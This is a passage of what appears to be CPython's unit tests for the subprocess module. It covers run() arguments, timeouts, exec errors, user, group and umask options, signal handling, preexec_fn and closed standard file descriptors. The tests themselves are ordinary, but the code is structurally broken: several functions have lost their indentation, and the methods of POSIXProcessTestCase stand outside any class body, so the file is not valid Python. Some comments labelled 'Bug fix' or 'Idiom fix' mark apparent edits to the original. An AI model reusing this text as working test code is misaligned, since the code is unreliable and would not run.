                 "import sys; sys.stdout.write(sys.stdin.read().upper())",
                stdin=tf, stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)

    def test_check_output_input_arg(self):
        # check_output() can be called with input set to a string
        cp = self.run_python(
                "import sys; sys.stdout.write(sys.stdin.read().upper())",
                input=b'pear', stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)

    def test_check_output_stdin_with_input_arg(self):
        # run() refuses to accept 'stdin' with 'input'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        with self.assertRaises(ValueError,
              msg="Expected ValueError when stdin and input args supplied.") as c:
            output = self.run_python("print('will not be run')",
                                     stdin=tf, input=b'hare')
        # the error message must name both conflicting arguments
        self.assertIn('stdin', c.exception.args[0])
        self.assertIn('input', c.exception.args[0])

    def test_check_output_timeout(self):
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            cp = self.run_python((
                     "import sys, time\n"
                     "sys.stdout.write('BDFL')\n"
                     "sys.stdout.flush()\n"
                     "time.sleep(3600)"),
                    # Some heavily loaded buildbots (sparc Debian 3.x) require
                    # this much time to start and print.
                    timeout=3, stdout=subprocess.PIPE)
        self.assertEqual(c.exception.output, b'BDFL')
        # output is aliased to stdout
        self.assertEqual(c.exception.stdout, b'BDFL')

    def test_run_kwargs(self):
        # extra keyword args (env here) are forwarded to Popen
        newenv = os.environ.copy()
        newenv["FRUIT"] = "banana"
        cp = self.run_python(('import sys, os;'
                      'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
                             env=newenv)
        self.assertEqual(cp.returncode, 33)

    def test_run_with_pathlike_path(self):
        # bpo-31961: test run(pathlike_object)
        # the name of a command that can be run without
        # any arguments that exit fast
        prog = 'tree.com' if mswindows else 'ls'
        path = shutil.which(prog)
        if path is None:
            self.skipTest(f'{prog} required for this test')
        path = FakePath(path)
        res = subprocess.run(path, stdout=subprocess.DEVNULL)
        self.assertEqual(res.returncode, 0)
        # a path-like is rejected when shell=True
        with self.assertRaises(TypeError):
            subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)

    def test_run_with_bytes_path_and_arguments(self):
        # bpo-31961: test run([bytes_object, b'additional arguments'])
        path = os.fsencode(sys.executable)
        args = [path, '-c', b'import sys; sys.exit(57)']
        res = subprocess.run(args)
        self.assertEqual(res.returncode, 57)

    def test_run_with_pathlike_path_and_arguments(self):
        # bpo-31961: test run([pathlike_object, 'additional arguments'])
        path = FakePath(sys.executable)
        args = [path, '-c', 'import sys; sys.exit(57)']
        res = subprocess.run(args)
        self.assertEqual(res.returncode, 57)

    def test_capture_output(self):
        # capture_output=True pipes both stdout and stderr
        cp = self.run_python(("import sys;"
                              "sys.stdout.write('BDFL'); "
                              "sys.stderr.write('FLUFL')"),
                             capture_output=True)
        self.assertIn(b'BDFL', cp.stdout)
        self.assertIn(b'FLUFL', cp.stderr)

    def test_stdout_with_capture_output_arg(self):
        # run() refuses to accept 'stdout' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stdout and capture_output "
                 "args supplied.")) as c:
            output = self.run_python("print('will not be run')",
                                     capture_output=True, stdout=tf)
        self.assertIn('stdout', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])

    def test_stderr_with_capture_output_arg(self):
        # run() refuses to accept 'stderr' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stderr and capture_output "
                 "args supplied.")) as c:
            output = self.run_python("print('will not be run')",
                                     capture_output=True, stderr=tf)
        self.assertIn('stderr', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])

    # This test _might_ wind up a bit fragile on loaded build+test machines
    # as it depends on the timing with wide enough margins for normal situations
    # but does assert that it happened "soon enough" to believe the right thing
    # happened.
    @unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
    def test_run_with_shell_timeout_and_capture_output(self):
        """Output capturing after a timeout mustn't hang forever on open filehandles."""
        before_secs = time.monotonic()
        try:
            subprocess.run('sleep 3', shell=True, timeout=0.1,
                           capture_output=True)  # New session unspecified.
        except subprocess.TimeoutExpired as exc:
            after_secs = time.monotonic()
            stacks = traceback.format_exc()  # assertRaises doesn't give this.
        else:
            self.fail("TimeoutExpired not raised.")
        self.assertLess(after_secs - before_secs, 1.5,
                        msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
                        f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
    """Create the bogus path used by the chdir/exec failure tests below."""
    super().setUp()
    # A path that cannot exist; used to provoke ENOENT in the child.
    self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
    """Return the exact OSError produced by chdir into the missing dir."""
    try:
        os.chdir(self._nonexistent_dir)
    except OSError as exc:
        # Capture the live exception instead of hard coding the errno
        # value or the OS perror() string; callers compare against its
        # fields.
        return exc
    self.fail("chdir to nonexistent directory %s succeeded." %
              self._nonexistent_dir)
def test_exception_cwd(self):
    """Test error in the child raised in the parent for a bad cwd."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             cwd=self._nonexistent_dir)
    except OSError as e:
        # Test that the child process chdir failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
        self.assertEqual(desired_exception.filename, e.filename)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
    """Test error in the child raised in the parent for a bad executable."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             executable=self._nonexistent_dir)
    except OSError as e:
        # Test that the child process exec failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
        self.assertEqual(desired_exception.filename, e.filename)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
    """Test error in the child raised in the parent for a bad args[0]."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
    except OSError as e:
        # Test that the child process exec failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
        self.assertEqual(desired_exception.filename, e.filename)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
    # Popen subclass whose destructor is a no-op (see comment above).
    def __del__(self):
        pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
    """Test error passing done through errpipe_write in the good case"""
    def proper_error(*args):
        # args[13] is the errpipe_write fd handed to fork_exec
        errpipe_write = args[13]
        # Write the hex for the error code EISDIR: 'is a directory'
        err_code = '{:x}'.format(errno.EISDIR).encode()
        os.write(errpipe_write, b"OSError:" + err_code + b":")
        return 0

    fork_exec.side_effect = proper_error

    with mock.patch("subprocess.os.waitpid",
                    side_effect=ChildProcessError):
        # the well-formed error report must resurface as the mapped
        # OSError subclass in the parent
        with self.assertRaises(IsADirectoryError):
            self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
    """Test error passing done through errpipe_write where its not
    in the expected format"""
    error_data = b"\xFF\x00\xDE\xAD"
    def bad_error(*args):
        errpipe_write = args[13]
        # Anything can be in the pipe, no assumptions should
        # be made about its encoding, so we'll write some
        # arbitrary hex bytes to test it out
        os.write(errpipe_write, error_data)
        return 0

    fork_exec.side_effect = bad_error

    with mock.patch("subprocess.os.waitpid",
                    side_effect=ChildProcessError):
        # unparseable data falls back to a generic SubprocessError
        # whose message echoes the raw bytes
        with self.assertRaises(subprocess.SubprocessError) as e:
            self.PopenNoDestructor(["non_existent_command"])

    self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
                 "need /proc/self/status")
def test_restore_signals(self):
    """restore_signals=True must un-ignore SIGPIPE and friends.

    Compares the SigIgn mask reported by /proc/self/status in a child
    spawned with restore_signals=False against one spawned with True.
    """
    def sig_ign_mask(proc_status):
        # Return the b'SigIgn...' line from a /proc status dump,
        # or None when no such line is present.
        for line in proc_status.splitlines():
            if line.startswith(b'SigIgn'):
                return line
        return None

    # Blindly assume that cat exists on systems with /proc/self/status...
    default_proc_status = subprocess.check_output(
            ['cat', '/proc/self/status'],
            restore_signals=False)
    default_sig_ign_mask = sig_ign_mask(default_proc_status)
    if default_sig_ign_mask is None:
        self.skipTest("SigIgn not found in /proc/self/status.")
    restored_proc_status = subprocess.check_output(
            ['cat', '/proc/self/status'],
            restore_signals=True)
    restored_sig_ign_mask = sig_ign_mask(restored_proc_status)
    # Bug fix: the original second scan had no fallback, so a missing
    # SigIgn line left restored_sig_ign_mask unbound and the test died
    # with a confusing NameError instead of a clear failure.
    self.assertIsNotNone(
            restored_sig_ign_mask,
            "SigIgn not found in second /proc/self/status read.")
    self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
                        msg="restore_signals=True should've unblocked "
                        "SIGPIPE and friends.")
def test_start_new_session(self):
    # Exercise the start_new_session=True path (i.e. setsid()).  An
    # EPERM from the environment is tolerated -- the call was still made,
    # which is all the coverage we're after.
    cmd = [sys.executable, "-c", "import os; print(os.getsid(0))"]
    try:
        output = subprocess.check_output(cmd, start_new_session=True)
    except OSError as e:
        if e.errno != errno.EPERM:
            raise
    else:
        # A fresh session means the child's sid differs from ours.
        self.assertNotEqual(os.getsid(0), int(output))
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
    # For code coverage of the user parameter. We don't care if we get an
    # EPERM error from it depending on the test execution environment, that
    # still indicates that it was called.
    uid = os.geteuid()
    # Try an arbitrary non-root uid plus our own effective uid.
    test_users = [65534 if uid != 65534 else 65533, uid]
    name_uid = "nobody" if sys.platform != 'darwin' else "unknown"

    if pwd is not None:
        try:
            pwd.getpwnam(name_uid)
            test_users.append(name_uid)
        except KeyError:
            # unknown user name
            name_uid = None

    for user in test_users:
        # posix_spawn() may be used with close_fds=False
        for close_fds in (False, True):
            with self.subTest(user=user, close_fds=close_fds):
                try:
                    output = subprocess.check_output(
                            [sys.executable, "-c",
                             "import os; print(os.getuid())"],
                            user=user,
                            close_fds=close_fds)
                except PermissionError:  # (EACCES, EPERM)
                    pass
                except OSError as e:
                    if e.errno not in (errno.EACCES, errno.EPERM):
                        raise
                else:
                    # The child must report the uid we asked for;
                    # resolve a symbolic name via pwd first.
                    if isinstance(user, str):
                        user_uid = pwd.getpwnam(user).pw_uid
                    else:
                        user_uid = user
                    child_user = int(output)
                    self.assertEqual(child_user, user_uid)

    # Invalid values must be rejected before any fork happens.
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, user=-1)

    with self.assertRaises(OverflowError):
        subprocess.check_call(ZERO_RETURN_CMD,
                              cwd=os.curdir, env=os.environ, user=2**64)

    if pwd is None and name_uid is not None:
        # A string user cannot be resolved without the pwd module.
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
    # Platforms without setreuid() must reject user= outright.
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
    # Coverage for the group parameter; a PermissionError just means we
    # lacked the privilege, which still proves setregid() was attempted.
    gid = os.getegid()
    group_list = [65534 if gid != 65534 else 65533]
    name_group = _get_test_grp_name()

    if grp is not None:
        group_list.append(name_group)

    for group in group_list + [gid]:
        # posix_spawn() may be used with close_fds=False
        for close_fds in (False, True):
            with self.subTest(group=group, close_fds=close_fds):
                try:
                    output = subprocess.check_output(
                            [sys.executable, "-c",
                             "import os; print(os.getgid())"],
                            group=group,
                            close_fds=close_fds)
                except PermissionError:  # (EACCES, EPERM)
                    pass
                else:
                    # Resolve a symbolic group name to its numeric gid
                    # before comparing with the child's report.
                    if isinstance(group, str):
                        group_gid = grp.getgrnam(group).gr_gid
                    else:
                        group_gid = group

                    child_group = int(output)
                    self.assertEqual(child_group, group_gid)

    # make sure we bomb on negative values
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, group=-1)

    with self.assertRaises(OverflowError):
        subprocess.check_call(ZERO_RETURN_CMD,
                              cwd=os.curdir, env=os.environ, group=2**64)

    if grp is None:
        # A string group cannot be resolved without the grp module.
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
    # Platforms without setregid() must reject group= outright.
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
    # Coverage for extra_groups=: the child reports os.getgroups() as
    # JSON; EPERM means we lacked privilege to change groups, in which
    # case the child should simply inherit the parent's groups.
    gid = os.getegid()
    group_list = [65534 if gid != 65534 else 65533]
    name_group = _get_test_grp_name()
    perm_error = False

    if grp is not None:
        group_list.append(name_group)

    try:
        output = subprocess.check_output(
                [sys.executable, "-c",
                 "import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
                extra_groups=group_list)
    except OSError as ex:
        if ex.errno != errno.EPERM:
            raise
        perm_error = True

    else:
        parent_groups = os.getgroups()
        child_groups = json.loads(output)

        if grp is not None:
            # Resolve symbolic names to numeric gids before comparing.
            desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
                            for g in group_list]
        else:
            desired_gids = group_list

        if perm_error:
            self.assertEqual(set(child_groups), set(parent_groups))
        else:
            self.assertEqual(set(desired_gids), set(child_groups))

    # make sure we bomb on negative values
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])

    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD,
                              cwd=os.curdir, env=os.environ,
                              extra_groups=[2**64])

    if grp is None:
        # A string group cannot be resolved without the grp module.
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD,
                                  extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
    # Platforms without setgroups() must reject extra_groups= outright.
    with self.assertRaises(ValueError):
        subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
                 'POSIX umask() is not available.')
def test_umask(self):
    """The umask= argument must be applied in the child before exec."""
    # Idiom: TemporaryDirectory replaces the manual mkdtemp/None-guard/
    # try/finally/rmtree dance with equivalent, exception-safe cleanup.
    with tempfile.TemporaryDirectory() as tmpdir:
        name = os.path.join(tmpdir, "beans")
        # We set an unusual umask in the child so as a unique mode
        # for us to test the child's touched file for.
        subprocess.check_call(
                [sys.executable, "-c", f"open({name!r}, 'w').close()"],
                umask=0o053)
        # Ignore execute permissions entirely in our test,
        # filesystems could be mounted to ignore or force that.
        st_mode = os.stat(name).st_mode & 0o666
        expected_mode = 0o624
        self.assertEqual(expected_mode, st_mode,
                         msg=f'{oct(expected_mode)} != {oct(st_mode)}')
def test_run_abort(self):
    # returncode must reflect death-by-signal as a negative value.
    with support.SuppressCrashReport():
        proc = subprocess.Popen(
                [sys.executable, "-c", 'import os; os.abort()'])
        proc.wait()
    self.assertEqual(signal.SIGABRT, -proc.returncode)
def test_CalledProcessError_str_signal(self):
    # A negative returncode stringifies as a signal description.  We're
    # relying on repr() of the signal.Signals intenum to provide the word
    # "signal", the signal name and the numeric value.
    message = str(subprocess.CalledProcessError(-int(signal.SIGABRT),
                                                "fake cmd"))
    self.assertIn("signal", message.lower())
    # Not asserting a specific name: some signals have several names and
    # which one is revealed can vary.
    self.assertIn("SIG", message)
    self.assertIn(str(signal.SIGABRT), message)

def test_CalledProcessError_str_unknown_signal(self):
    # Signal numbers with no symbolic name fall back to "unknown signal".
    message = str(subprocess.CalledProcessError(-9876543, "fake cmd"))
    self.assertIn("unknown signal 9876543.", message)

def test_CalledProcessError_str_non_zero(self):
    # A positive returncode stringifies as a plain exit status.
    message = str(subprocess.CalledProcessError(2, "fake cmd"))
    self.assertIn("non-zero exit status 2.", message)
def test_preexec(self):
    # DISCLAIMER: Setting environment variables is *not* a good use
    # of a preexec_fn. This is merely a test.
    def put_fruit():
        os.putenv("FRUIT", "apple")

    proc = subprocess.Popen(
            [sys.executable, "-c",
             'import sys,os;'
             'sys.stdout.write(os.getenv("FRUIT"))'],
            stdout=subprocess.PIPE,
            preexec_fn=put_fruit)
    with proc:
        self.assertEqual(b"apple", proc.stdout.read())
def test_preexec_exception(self):
    # An exception raised inside preexec_fn must propagate to the
    # parent.  Which exception type arrives depends on the backend:
    # the C _posixsubprocess wraps it in SubprocessError, while a pure
    # Python fallback would deliver the original ValueError.
    def raise_it():
        raise ValueError("What if two swallows carried a coconut?")
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             preexec_fn=raise_it)
    except subprocess.SubprocessError as e:
        # Only valid when the C extension module is in use.
        self.assertTrue(
                subprocess._posixsubprocess,
                "Expected a ValueError from the preexec_fn")
    except ValueError as e:
        self.assertIn("coconut", e.args[0])
    else:
        self.fail("Exception raised by preexec_fn did not make it "
                  "to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
    """Used to test behavior at the end of _execute_child."""
    def __init__(self, testcase, *args, **kwargs):
        # Keep the TestCase around so _execute_child() can assert.
        self._testcase = testcase
        subprocess.Popen.__init__(self, *args, **kwargs)

    def _execute_child(self, *args, **kwargs):
        try:
            subprocess.Popen._execute_child(self, *args, **kwargs)
        finally:
            # Open a bunch of file descriptors and verify that
            # none of them are the same as the ones the Popen
            # instance is using for stdin/stdout/stderr.
            # If a pipe fd had been double-closed, one of these fresh
            # fds would land on its number (#16140).
            devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
                           for _ in range(8)]
            try:
                for fd in devzero_fds:
                    self._testcase.assertNotIn(
                            fd, (self.stdin.fileno(), self.stdout.fileno(),
                                 self.stderr.fileno()),
                            msg="At least one fd was closed early.")
            finally:
                for fd in devzero_fds:
                    os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
    """Issue16140: Don't double close pipes on preexec error."""
    def failing_preexec():
        raise subprocess.SubprocessError(
                "force the _execute_child() errpipe_data path.")

    # _TestExecuteChildPopen asserts the stdio fds are still alive at
    # the end of _execute_child even on the error path.
    with self.assertRaises(subprocess.SubprocessError):
        self._TestExecuteChildPopen(
                self, ZERO_RETURN_CMD,
                stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                stderr=subprocess.PIPE, preexec_fn=failing_preexec)
def test_preexec_gc_module_failure(self):
    # This tests the code that disables garbage collection if the child
    # process will execute any Python.
    enabled = gc.isenabled()
    try:
        # Case 1: gc starts disabled -- Popen must leave it disabled.
        gc.disable()
        self.assertFalse(gc.isenabled())
        subprocess.call([sys.executable, '-c', ''],
                        preexec_fn=lambda: None)
        self.assertFalse(gc.isenabled(),
                         "Popen enabled gc when it shouldn't.")

        # Case 2: gc starts enabled -- Popen must re-enable it after
        # its temporary disable around fork().
        gc.enable()
        self.assertTrue(gc.isenabled())
        subprocess.call([sys.executable, '-c', ''],
                        preexec_fn=lambda: None)
        self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
    finally:
        # Restore whatever gc state the test runner started with.
        if not enabled:
            gc.disable()
@unittest.skipIf(
    sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
    # The internal code did not preserve the previous exception when
    # re-enabling garbage collection
    try:
        from resource import getrlimit, setrlimit, RLIMIT_NPROC
    except ImportError as err:
        self.skipTest(err)  # RLIMIT_NPROC is specific to Linux and BSD
    limits = getrlimit(RLIMIT_NPROC)
    [_, hard] = limits
    # A zero soft process limit makes the next fork() fail with EAGAIN.
    setrlimit(RLIMIT_NPROC, (0, hard))
    self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
    try:
        subprocess.call([sys.executable, '-c', ''],
                        preexec_fn=lambda: None)
    except BlockingIOError:
        # Forking should raise EAGAIN, translated to BlockingIOError
        pass
    else:
        self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
    """A string `args` must be executed directly (no list wrapping)."""
    # args is a string
    fd, fname = tempfile.mkstemp()
    # Robustness fix: previously os.remove() only ran after a
    # successful wait(), leaking the script on any earlier failure.
    self.addCleanup(os.remove, fname)
    # reopen in text mode
    with open(fd, "w", errors="surrogateescape") as fobj:
        fobj.write("#!%s\n" % support.unix_shell)
        fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                   sys.executable)
    os.chmod(fname, 0o700)
    p = subprocess.Popen(fname)
    p.wait()
    self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
    # Windows-only keyword arguments must raise ValueError on POSIX.
    cmd = [sys.executable, "-c", "import sys; sys.exit(47)"]
    for bad_kwargs in ({'startupinfo': 47}, {'creationflags': 47}):
        with self.assertRaises(ValueError):
            subprocess.call(cmd, **bad_kwargs)
def test_shell_sequence(self):
    """Run a command through the shell when args is a sequence."""
    newenv = os.environ.copy()
    newenv["FRUIT"] = "apple"
    # Idiom fix: shell takes a bool; the old `shell=1` relied on
    # truthiness.
    p = subprocess.Popen(["echo $FRUIT"], shell=True,
                         stdout=subprocess.PIPE,
                         env=newenv)
    with p:
        # Strip trailing shell whitespace/newline variations.
        self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
    """Run a command through the shell when args is a string."""
    newenv = os.environ.copy()
    newenv["FRUIT"] = "apple"
    # Idiom fix: shell takes a bool; the old `shell=1` relied on
    # truthiness.
    p = subprocess.Popen("echo $FRUIT", shell=True,
                         stdout=subprocess.PIPE,
                         env=newenv)
    with p:
        # Strip trailing shell whitespace/newline variations.
        self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
    """call() function with string argument on UNIX."""
    fd, fname = tempfile.mkstemp()
    # Robustness fix: previously os.remove() only ran after call()
    # succeeded, leaking the script on any earlier failure.
    self.addCleanup(os.remove, fname)
    # reopen in text mode
    with open(fd, "w", errors="surrogateescape") as fobj:
        fobj.write("#!%s\n" % support.unix_shell)
        fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                   sys.executable)
    os.chmod(fname, 0o700)
    rc = subprocess.call(fname)
    self.assertEqual(rc, 47)
def test_specific_shell(self):
    # Issue #9265: the shell named by `executable` must end up as argv[0].
    candidates = [os.path.join(prefix, name)
                  for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']
                  for name in ['bash', 'ksh']]
    shells = [path for path in candidates if os.path.isfile(path)]
    if not shells:  # Will probably work for any shell but csh.
        self.skipTest("bash or ksh required for this test")
    sh = '/bin/sh'
    if os.path.isfile(sh) and not os.path.islink(sh):
        # Test will fail if /bin/sh is a symlink to csh.
        shells.append(sh)
    for sh in shells:
        proc = subprocess.Popen("echo $0", executable=sh, shell=True,
                                stdout=subprocess.PIPE)
        with proc:
            self.assertEqual(proc.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
    # Spawn a sleeping child, invoke p.<method>(*args) on it and return
    # the Popen so the caller can inspect exit status and stderr.
    #
    # Do not inherit file handles from the parent.
    # It should fix failures on some platforms.
    # Also set the SIGINT handler to the default to make sure it's not
    # being ignored (some tests rely on that.)
    old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
    try:
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time

                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             close_fds=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
    finally:
        # Restore the runner's SIGINT handler no matter what.
        signal.signal(signal.SIGINT, old_handler)

    # Wait for the interpreter to be completely initialized before
    # sending any signal.
    p.stdout.read(1)
    getattr(p, method)(*args)
    return p
# NOTE: decorating this *helper* with skipIf means that on the listed
# platforms calling it raises SkipTest, which skips the calling test.
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
                 "Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
    # Spawn a child that exits immediately, then invoke p.<method> on
    # the already-dead process; the call must not raise.
    #
    # Do not inherit file handles from the parent.
    # It should fix failures on some platforms.
    p = subprocess.Popen([sys.executable, "-c", """if 1:
                         import sys, time

                         sys.stdout.write('x\\n')
                         sys.stdout.flush()
                         """],
                         close_fds=True,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    # Wait for the interpreter to be completely initialized before
    # sending any signal.
    p.stdout.read(1)
    # The process should end after this
    time.sleep(1)
    # This shouldn't raise even though the child is now dead
    getattr(p, method)(*args)
    p.communicate()
def test_send_signal(self):
    # SIGINT must surface in the child as KeyboardInterrupt.
    proc = self._kill_process('send_signal', signal.SIGINT)
    _, err = proc.communicate()
    self.assertIn(b'KeyboardInterrupt', err)
    self.assertNotEqual(proc.wait(), 0)

def test_kill(self):
    # kill() terminates silently with -SIGKILL as the return code.
    proc = self._kill_process('kill')
    _, err = proc.communicate()
    self.assertEqual(err, b'')
    self.assertEqual(proc.wait(), -signal.SIGKILL)

def test_terminate(self):
    # terminate() terminates silently with -SIGTERM as the return code.
    proc = self._kill_process('terminate')
    _, err = proc.communicate()
    self.assertEqual(err, b'')
    self.assertEqual(proc.wait(), -signal.SIGTERM)

def test_send_signal_dead(self):
    # Signalling an already-exited child must not raise.
    self._kill_dead_process('send_signal', signal.SIGINT)

def test_kill_dead(self):
    # Killing an already-exited child must not raise.
    self._kill_dead_process('kill')

def test_terminate_dead(self):
    # Terminating an already-exited child must not raise.
    self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
    # Issue #9905: test that subprocess pipes still work properly with
    # some standard fds closed
    stdin = 0
    saved_fds = self._save_fds(fds)
    # If fd 0 is among those being closed, feed the child from the
    # saved duplicate so it still has a valid stdin.
    for fd, saved, inheritable in saved_fds:
        if fd == 0:
            stdin = saved
            break
    try:
        for fd in fds:
            os.close(fd)
        out, err = subprocess.Popen([sys.executable, "-c",
                        'import sys;'
                        'sys.stdout.write("apple");'
                        'sys.stdout.flush();'
                        'sys.stderr.write("orange")'],
                   stdin=stdin,
                   stdout=subprocess.PIPE,
                   stderr=subprocess.PIPE).communicate()
        self.assertEqual(out, b'apple')
        self.assertEqual(err, b'orange')
    finally:
        # Reinstall the original std fds regardless of outcome.
        self._restore_fds(saved_fds)
# Drive check_close_std_fds() through every combination of closed
# standard descriptors (see issues #9905 and #10806).
def test_close_fd_0(self):
    self.check_close_std_fds([0])

def test_close_fd_1(self):
    self.check_close_std_fds([1])

def test_close_fd_2(self):
    self.check_close_std_fds([2])

def test_close_fds_0_1(self):
    self.check_close_std_fds([0, 1])

def test_close_fds_0_2(self):
    self.check_close_std_fds([0, 2])

def test_close_fds_1_2(self):
    self.check_close_std_fds([1, 2])

def test_close_fds_0_1_2(self):
    # Issue #10806: test that subprocess pipes still work properly with
    # all standard fds closed.
    self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
    """Issue #15798: Popen should work when stdio fds are available."""
    new_stdin = os.dup(0)
    new_stdout = os.dup(1)
    try:
        # Free fds 0 and 1 so the internal errpipe lands on a low number.
        os.close(0)
        os.close(1)

        # Side test: if errpipe_write fails to have its CLOEXEC
        # flag set this should cause the parent to think the exec
        # failed.  Extremely unlikely: everyone supports CLOEXEC.
        subprocess.Popen([
                sys.executable, "-c",
                "print('AssertionError:0:CLOEXEC failure.')"]).wait()
    finally:
        # Restore original stdin and stdout
        os.dup2(new_stdin, 0)
        os.dup2(new_stdout, 1)
        os.close(new_stdin)
        os.close(new_stdout)
def test_remapping_std_fds(self):
    # Pass the three temp fds as stdin/stdout/stderr in a scrambled
    # order; the child-side remapping must still wire them correctly.
    # open up some temporary files
    temps = [tempfile.mkstemp() for i in range(3)]
    try:
        temp_fds = [fd for fd, fname in temps]

        # unlink the files -- we won't need to reopen them
        for fd, fname in temps:
            os.unlink(fname)

        # write some data to what will become stdin, and rewind
        os.write(temp_fds[1], b"STDIN")
        os.lseek(temp_fds[1], 0, 0)

        # move the standard file descriptors out of the way
        saved_fds = self._save_fds(range(3))
        try:
            # duplicate the file objects over the standard fd's
